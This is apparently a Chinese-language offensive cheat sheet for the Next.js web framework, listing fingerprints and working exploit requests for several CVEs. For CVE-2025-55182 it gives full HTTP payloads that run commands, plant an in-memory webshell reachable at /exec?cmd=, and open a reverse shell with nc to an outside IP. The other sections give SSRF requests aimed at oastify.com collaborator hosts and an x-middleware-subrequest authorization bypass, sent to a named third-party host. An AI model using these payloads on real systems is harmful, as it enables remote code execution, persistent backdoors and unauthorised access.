1.Next.js简介
https://nextjs.org/docs
Next.js 是一个基于 React 构建的现代化、全功能 Web 应用框架,由 Vercel(原 Zeit)团队开发并维护。它旨在简化 React 应用的开发流程,同时提供开箱即用的服务端渲染(SSR)、静态生成(SSG)、API 路由、图像优化、TypeScript 支持、路由系统等企业级能力。
1
2
3
4
5
6
7
8
9
10
11
|
my-next-app/
├── app/ # 新路由系统(App Router)
│ ├── layout.tsx # 全局或嵌套路由布局
│ ├── page.tsx # 首页
│ ├── dashboard/
│ │ └── page.tsx # /dashboard 路由
│ └── api/
│ └── hello/route.ts # API 路由(App Router 风格)
├── public/ # 静态资源(如 favicon.ico)
├── next.config.js # 配置文件
└── package.json
|
2.常见指纹
1
|
app.name="Next.js" || web.body="/_next/static/chunks/app/ 网络空间搜索引擎指纹
|
3.常见漏洞
3.1.最新0day—CVE-2025-55182
https://mp.weixin.qq.com/s/lSG9bsq0OBsMpPeEIaGNMQ
**Next.js (App Router 用户):**由于 Next.js 深度集成了 RSC,以下版本均受影响(CVE-2025-66478):
- Next.js v15.0.0 - v15.0.4
- Next.js v15.1.0 - v15.1.8
- Next.js v15.2.x - v15.5.6
- Next.js v16.0.0 - v16.0.6
- Next.js v14.3.0-canary.77 及以上 Canary 版本
1.无回显Poc:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
|
2.有回显Poc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
POST /apps HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
|
3.打内存马
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 565
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"(async()=>{const http=await import('node:http');const url=await import('node:url');const cp=await import('node:child_process');const originalEmit=http.Server.prototype.emit;http.Server.prototype.emit=function(event,...args){if(event==='request'){const[req,res]=args;const parsedUrl=url.parse(req.url,true);if(parsedUrl.pathname==='/exec'){const cmd=parsedUrl.query.cmd||'whoami';cp.exec(cmd,(err,stdout,stderr)=>{res.writeHead(200,{'Content-Type':'application/json'});res.end(JSON.stringify({success:!err,stdout,stderr,error:err?err.message:null}));});return true;}}return originalEmit.apply(this,arguments);};})();","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
利用方法:/exec?cmd=whoami
|
4.反弹shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 588
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('nc -c sh 192.168.50.226 4444');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
|
注意事项:在验证漏洞是否存在过程中,应尽量避免使用 execSync函数执行,这样可能造成系统阻塞的命令(如ping,curl,wget等),因为Node.js是单线程事件循环模型,execSync会阻塞整个事件循环导致所有请求都被阻塞。推荐使用异步 exe
3.2.next.js图片组件SSRF
https://deepstrike.io/blog/nextjs-security-testing-bug-bounty-guide
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
GET /_next/image?url=5syrggwbtvnlia85n5fu5shaz15stlha.oastify.com HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest:middleware:middleware:middleware:middleware:middleware
Location: http://pngbb0rvofi5du3pipae0ccuul0co4ct.oastify.com
Referer: http://test.college.jiaqingren.net:8001/
GET /_next/image?url=/path&w=1&q=75 HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest:middleware:middleware:middleware:middleware:middleware
Location: http://pngbb0rvofi5du3pipae0ccuul0co4ct.oastify.com
Referer: http://test.college.jiaqingren.net:8001/
|
3.3.CVE-2025-57822 SSRF
漏洞成因:未清理Http头导致SSRF,只需要在请求头加上Location字段即可
https://mp.weixin.qq.com/s/acQrWzVDo7QLgaOHYKq97w
1
2
3
4
5
6
7
8
9
10
11
|
GET / HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest:middleware:middleware:middleware:middleware:middleware
Location: http://pngbb0rvofi5du3pipae0ccuul0co4ct.oastify.com
|
3.4.CVE-2025-29927 权限绕过
https://mp.weixin.qq.com/s/f1JxoeZnxqboN39PaZq9NQ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
//受影响版本
11.1.4 < Next.js ≤ 13.5.6
14.0 < Next.js < 14.2.25
15.0 < Next.js < 15.2.3
GET / HTTP/1.1
Host: test.college.jiaqingren.net:8001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
x-middleware-subrequest:middleware:middleware:middleware:middleware:middleware
|
